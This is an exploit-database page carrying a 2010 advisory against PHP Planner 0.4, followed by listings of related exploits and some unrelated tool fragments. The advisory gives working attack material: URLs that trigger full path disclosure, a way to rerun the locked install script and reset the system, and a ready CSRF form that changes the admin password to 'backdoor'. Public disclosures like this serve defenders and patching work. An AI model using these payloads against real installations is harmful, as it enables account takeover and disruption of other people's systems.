Menu

Search for hundreds of thousands of exploits

"PHPplanner PHP Planner 0.4 - Multiple Vulnerabilities"

Author

Exploit author

cp77fk4r

Platform

Exploit platform

php

Release date

Exploit published date

2010-06-13

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
# Title: phpplanner <= PHP Planner v.0.4 Multiple Vulnerabilities
# Date: 13/05/10
# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il
# Software Link: http://phpplanner.sourceforge.net/
# Version: <= v.0.4
# Tested on: PHP
#
##[Full Path Disclosure]
(Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the
path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain
vulnerabilities, such as using the load_file() (within a SQL Injection)
query to view the page source, require the attacker to have the full path to
the file they wish to view. (OWASP))
#
http://[server]/phpplanner/manage.php?stamp=cP
http://[server/phpplanner/index.php?view=cP
#
Will returne:
#
Warning: strftime() expects parameter 2 to be long, string given in
[FPD]\phpplanner\lib\functions.php on line 87
#and:
Warning: date() expects parameter 2 to be long, string given in
[FPD]\phpplanner\common.php on line 180
#
##[Remote System Init]
Install_mysql.php's role is to create the database tables during
installation of the system.
After the end of his job, his name will be changed to
"Install_mysql.php.lock":
(rename(__FILE__,__FILE__ . '.lock');)
#
If the attacker will enter to this page (.php.lock) the code will run again
and will reset the system.
#
##[Cross Site Request Forgery]
(CSRF is an attack which forces an end user to execute unwanted actions on a
web application in which he/she is currently authenticated. With a little
help of social engineering (like sending a link via email/chat), an attacker
may force the users of a web application to execute actions of the
attacker's choosing. A successful CSRF exploit can compromise end user data
and operation in case of normal user. If the targeted end user is the
administrator account, this can compromise the entire web application.)
(OWASP))
#
http://[server]/phpplanner/user_edit.php
#
To change the user's password:
#
HTTP GET: /user_edit.php
HTTP POST: edtUsername = [victim's user name] && edtPassword = backdoor &&
edtPassword2 =backdoor
#
PoC:
#
<form name="form1" method="post" action="http://
[server]/phpplanner/user_edit.php">
<input name="edtUsername" type="hidden" size="60"
value="admin">
<input name="edtPassword" type="hidden" size="60"
value="backdoor">
<input name="edtPassword2" type="hidden" size="60"
value="backdoor">
</form>

#
#
[e0f]
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2010-06-22 "PHP Event Calendar 1.5 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-06-22 "SoftComplex PHP Event Calendar 1.5 - Multiple Remote Vulnerabilities" webapps php cp77fk4r
2010-06-13 "PHPplanner PHP Planner 0.4 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-05-30 "Nginx 0.6.36 - Directory Traversal" remote multiple cp77fk4r
2010-05-18 "phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting / Full Path" webapps php cp77fk4r
2010-04-13 "Blog System 1.5 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-04-12 "Blog System 1.x - Multiple Input Validation Vulnerabilities" webapps php cp77fk4r
2010-04-08 "Tiny Java Web Server 1.71 - Multiple Input Validation Vulnerabilities" remote multiple cp77fk4r
2010-04-08 "miniature java Web server 1.71 - Multiple Vulnerabilities" remote multiple cp77fk4r
2010-04-03 "SafeSHOP 1.5.6 - Cross-Site Scripting / Multiple Cross-Site Request Forgery Vulnerabilities" webapps asp cp77fk4r
2010-04-03 "Java Mini Web Server 1.0 - Directory Traversal / Cross-Site Scripting" remote multiple cp77fk4r
2010-03-27 "Uebimiau Webmail 2.7.2 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-02-11 "PHP Captcha Security Images - Denial of Service" dos php cp77fk4r
2010-02-09 "MOJO's IWms 7 - SQL Injection / Cross-Site Scripting" webapps asp cp77fk4r
2010-02-06 "ShopEx Single 4.5.1 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-02-06 "ShopEx Single 4.5.1 - 'errinfo' Cross-Site Scripting" webapps java cp77fk4r
2010-01-24 "SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection" webapps php cp77fk4r
2010-01-21 "SHOUTcast Server 1.9.8/Win32 - Cross-Site Request Forgery" webapps windows cp77fk4r
2009-12-25 "cms -db 0.7.13 - Multiple Vulnerabilities" webapps php cp77fk4r
2009-12-22 "DeluxeBB 1.3 - Multiple Vulnerabilities" webapps php cp77fk4r
2009-12-21 "social Web CMS Beta 2 - Multiple Vulnerabilities" webapps php cp77fk4r
2007-12-17 "MOJO IWms 7 - 'default.asp' Cookie Manipulation" webapps asp cp77fk4r 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected